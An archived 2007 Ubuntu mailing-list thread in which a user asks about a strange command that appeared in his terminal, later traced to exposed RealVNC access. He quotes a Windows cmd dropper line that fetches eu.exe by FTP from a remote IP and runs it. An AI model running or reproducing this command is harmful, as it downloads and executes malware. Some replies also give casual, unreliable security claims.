Antivirus program for ubuntu feisty amd64

Sat May 12 06:16:05 UTC 2007

cj wrote:
> Lucio M Nicolosi wrote:
>   
>> cj wrote:
>>   
>>     
>>> Lucio M Nicolosi wrote:
>>>   
>>>     
>>>       
>>>> Mario Vukelic wrote:
>>>>   
>>>>     
>>>>       
>>>>         
>>>>>> You would not have had any infections on Linux without the antivir
>>>>>> program either, since there are no Linux viruses in the wild :)
>>>>>>       
>>>>>>         
>>>>>>           
>>>>>>             
>>>> New to Linux, installed a Ubuntu 6.10 partition (for tests) in my office 
>>>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy 
>>>> and Firewall).
>>>>
>>>> A couple of days ago noticed an application suddenly taking control of 
>>>> the terminal window and running the following script:
>>>>
>>>> (user)@phil:~$ 5~.~
>>>>
>>>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>>>>
>>>> (user)@phil:~$ cmd /c echo open 201.27.157.123 42043 >> ik     &echo 
>>>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik 
>>>> &del ik &eu.exe &exit
>>>>
>>>> from the script "ik" in /home/(user)
>>>>
>>>> Could't find any "ik" script in my home (Ubuntu 7.04) desktop.
>>>>
>>>> Looked like a worm, then I run antivirus on Win partition, looked for 
>>>> the Windows "eu.exe" virus and variants but found no trace of it, at 
>>>> least on my desktop.
>>>>
>>>> Has anyone any idea of what kind of script is this?
>>>>
>>>> L.
>>>>
>>>>   
>>>>     
>>>>       
>>>>         
>>> More then likely, someone logged on to your computer (looks like they 
>>> did it through telnet, but i could be wrong). In that case, either hook 
>>> your computer into a firewall or download one for linux (which linux 
>>> doesnt really need one, but if you are using your system for large-scale 
>>> business, then its a good idea to get a firewall)
>>>
>>> Sometimes i have noticed that when somebody logs on to my system and 
>>> runs there script (yes i was hacked once..good thing my firewall blocked 
>>> the attack...but it didnt catch the remote login?), it doesnt execute 
>>> right..just fyi..most of the time it does though, especially when DoSing.
>>>
>>> --cj
>>>
>>>   
>>>     
>>>       
>> Since my Intranet is already behind a (Suse) firewall, I was wondering 
>> if (either it was invaded or) a worm residing on another (Win) desktop 
>> could take control of my (Linux) terminal and run this script to try 
>> install itself in the Win environment. Since it apparently happened in 
>> two different ocasions, it looks like an autorun script. Could you tell 
>> me where to find the autorun config file in Ubuntu?
>>
>> Tks for the answer, cj.
>>
>> L.
>>
>>   
>>     
> well the problem is, is that a worm on windows will not harm a linux 
> system, as windows programs are not linux compatible with out a windows 
> compatibility layer (such as _wine_ )
> --cj
Did a little more research and guess found the culprit: RealVNC access 
through a Static IP.
See:
http://episteme.arstechnica.com/eve/forums/a/tpc/f/469092836/m/264004244831

Very dangerous stuff indeed...

L.